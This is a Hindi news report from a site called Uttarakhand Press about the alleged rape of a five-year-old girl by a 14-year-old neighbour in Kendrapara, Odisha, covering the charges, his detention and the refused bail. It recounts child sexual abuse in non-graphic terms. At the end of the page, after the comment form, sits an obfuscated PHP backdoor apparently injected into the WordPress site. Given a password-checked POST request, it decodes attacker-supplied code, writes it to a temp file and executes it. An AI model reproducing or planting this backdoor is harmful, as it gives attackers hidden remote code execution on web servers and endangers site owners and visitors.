Crime: पांच साल की बच्ची से 14 साल के किशोर ने किया दुष्कर्म, चॉकलेट का लालच देकर ले गया सुनसान जगह

Uttarakhand Press 16 October 2023: Odisha Rape Case ओड़िशा से एक शर्मनाक मामला सामने आया है। यहां एक नाबालिक लड़के ने पांच साल की बच्ची के साथ घिनौने कृत्य को अंजाम दिया है। इतना ही नहीं आरोपित ने बच्ची को इस घिनौने कृत्य के बारे में किसी को बताने पर गंभीर परिणाम भुगतने की धमकी भी दी है। पुलिस ने किशोर को आईपीसी की विभिन्न धाराओं के तहत हिरासत में ले लिया है।

ओड़िशा के केंद्रापाड़ा सदर पुलिस थाने के अंतर्गत एक गांव में पांच साल की बच्ची से दुष्कर्म के आरोप में 14 वर्षीय किशोर को पकड़ा गया है।आरोप है कि पीड़िता के पड़ोसी ने कथित तौर पर शुक्रवार शाम इस घिनौने कृत्य को अंजाम दिया। दुष्कर्म के बाद, आरोपी ने कथित तौर पर नाबालिग लड़की को घटना का खुलासा करने पर गंभीर परिणाम भुगतने की धमकी भी दी।

बच्ची को दिया था चॉकलेट का लालच:
हालांकि, बच्ची ने अपने माता-पिता को बताया और उन्होंने शनिवार को किशोर के खिलाफ प्राथमिकी दर्ज कराई। प्राथमिकी में कहा गया है कि बच्ची को आरोपी गांव में एक सुनसान स्थान पर ले गया था। आरोपी किशोर ने बच्ची को चॉकलेट का लालच दिया था। फिर उसके साथ दुष्कर्म की वारदात को अंजाम दिया।

किशोर को लिया गया हिरासत में:
एफआईआर पर कार्रवाई करते हुए, किशोर को आईपीसी की विभिन्न धाराओं के तहत हिरासत में ले लिया गया, जिसमें 376 एबी (12 साल से कम उम्र की बच्ची से दुष्कर्म के लिए सजा), 294 (अश्लील हरकतें), 341 (गलत तरीके से रोकना), और 506 ( आपराधिक धमकी) शामिल हैं।

इसके अतिरिक्त, आरोपी पर यौन अपराध से बच्चों का संरक्षण अधिनियम, 2012 की धारा 4 और 6 के तहत आरोप लगाए गए हैं। किशोर ने कथित तौर पर पुलिस पूछताछ के दौरान अपना अपराध कबूल कर लिया है।

जमानत याचिका खारिज:
केंद्रापाड़ा के सरकारी अस्पताल में डॉक्टरों द्वारा पीड़िता की चिकित्सकीय जांच की गई, इसकी पुष्टि केंद्रपाड़ा सदर पुलिस स्टेशन के प्रभारी निरीक्षक सरोज कुमार साहू ने की है। आरोपी को शनिवार को केंद्रपाड़ा में किशोर न्याय बोर्ड (जेजेबी) के सामने पेश किया गया।

अधिकारी ने बताया कि जेजेबी ने उसकी जमानत याचिका खारिज कर दी और अनुगुल के ऑब्जर्वेशन होम में भेजने का आदेश दिया गया है।

Read Previous

महाराष्ट्र में बड़ा हादसा: छत्रपति संभाजी नगर में टेंपो और ट्रक में भिड़त, 12 लोगों की मौत, पीएम ने किया मुआवजे का एलान

Read Next

Same Gender Marriage: क्या भारत में मिलेगी समलैंगिक विवाह को मंजूरी?… सुप्रीम कोर्ट आज सुनाएगा अहम फैसला

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}